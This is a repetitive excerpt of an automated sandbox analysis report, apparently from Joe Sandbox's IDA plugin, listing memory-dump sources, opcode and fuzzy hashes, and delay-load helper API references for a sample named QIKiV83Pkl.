                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 26e389e68f1ebf38de5649042ba9c3eaf354507849d9aed339e15277f521fb23
                • Instruction ID: a563399c312eed0132de3c0342b7c8a77a77f8c75227d04663f8af0c60b0bd92
                • Opcode Fuzzy Hash: 26e389e68f1ebf38de5649042ba9c3eaf354507849d9aed339e15277f521fb23
                • Instruction Fuzzy Hash: BBB0129527C302EC310C71486C12D36037CF1C0B10330861BF30DD23C1E9807C085232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: bfb5251f0d469d06994d52b456dd1dcf559468f57216c4d5d0dd279d44601fa9
                • Instruction ID: 44e3c2b488b53e2ef12be9220bb6cfa7109ef072dba8f142ab80c7e7bf322236
                • Opcode Fuzzy Hash: bfb5251f0d469d06994d52b456dd1dcf559468f57216c4d5d0dd279d44601fa9
                • Instruction Fuzzy Hash: 0CB09295268201AC310871486812936036CE1C5B10320861AB609D2281A9806C085232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0961bc92abee825fb4cb689334fb0e5dd284de7d0614bcfe4156c5a33695bbd8
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 0961bc92abee825fb4cb689334fb0e5dd284de7d0614bcfe4156c5a33695bbd8
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fe0bc31e849b6110b9686593af4e655ce637c522b17bf4fb3292653d58b205c1
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: fe0bc31e849b6110b9686593af4e655ce637c522b17bf4fb3292653d58b205c1
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 18acd61d3881501dd5d22b8008e5207d5ed270f3b89f8ffc67b6c6adf428d129
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 18acd61d3881501dd5d22b8008e5207d5ed270f3b89f8ffc67b6c6adf428d129
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3ef214b9db2a73c35f77ac5deb2a5650bd06f02e33d1709ce3639fb26a0eca88
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 3ef214b9db2a73c35f77ac5deb2a5650bd06f02e33d1709ce3639fb26a0eca88
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e7a4bcabdbe9c265d96f9046fcb9edb97dc80d33e187e082093e8008a80bc8a3
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: e7a4bcabdbe9c265d96f9046fcb9edb97dc80d33e187e082093e8008a80bc8a3
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 621f1a94c110a3d246afe6183857c5ca56265245eb0c93d728128310ae7cafc5
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 621f1a94c110a3d246afe6183857c5ca56265245eb0c93d728128310ae7cafc5
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e3dea2301a4bb5cd4a9651646c3947b8efe481a6ff3733dcdc78576b76b45d32
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: e3dea2301a4bb5cd4a9651646c3947b8efe481a6ff3733dcdc78576b76b45d32
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d5dd35fb757563675c3340989994898af07ada57f44b653de7a2e06a2187f403
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: d5dd35fb757563675c3340989994898af07ada57f44b653de7a2e06a2187f403
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7c1f150914a4ac2170db185a8f80bb64152e87d71031bc6fc1c1607090c5bcb9
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 7c1f150914a4ac2170db185a8f80bb64152e87d71031bc6fc1c1607090c5bcb9
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f6f8b09a3fc5234c2e2dff795dce9b1e1eee8ba0ae48122c1787f260c7fbf2b9
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: f6f8b09a3fc5234c2e2dff795dce9b1e1eee8ba0ae48122c1787f260c7fbf2b9
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a2c9f54480bd881c3e6b4ea214503dc27083fc56e20ed63016d2a7f8d56f6a93
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: a2c9f54480bd881c3e6b4ea214503dc27083fc56e20ed63016d2a7f8d56f6a93
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 95f3c4cfe85bd14d01e7f495294b5968a241132cedc50896da07adee5af870c5
                • Instruction ID: 7d2ee66353ef50660069516cf4a55b60b4ca4539dcb9f9b29b61625d835e022a
                • Opcode Fuzzy Hash: 95f3c4cfe85bd14d01e7f495294b5968a241132cedc50896da07adee5af870c5
                • Instruction Fuzzy Hash: C1A011A22AC2023C300CB202AE02C3A032CF0C0BA2330820AB00AE00CAA88808082A32
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5b4cbec4950156b8ede51f7840b69f9bbe47f22a60eadc3dc55af23d682497f8
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: 5b4cbec4950156b8ede51f7840b69f9bbe47f22a60eadc3dc55af23d682497f8
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fcf21bc41aede944e138f1457e0c8d597d2430fa791eb4bcac7cd64f0b46e8f6
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: fcf21bc41aede944e138f1457e0c8d597d2430fa791eb4bcac7cd64f0b46e8f6
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
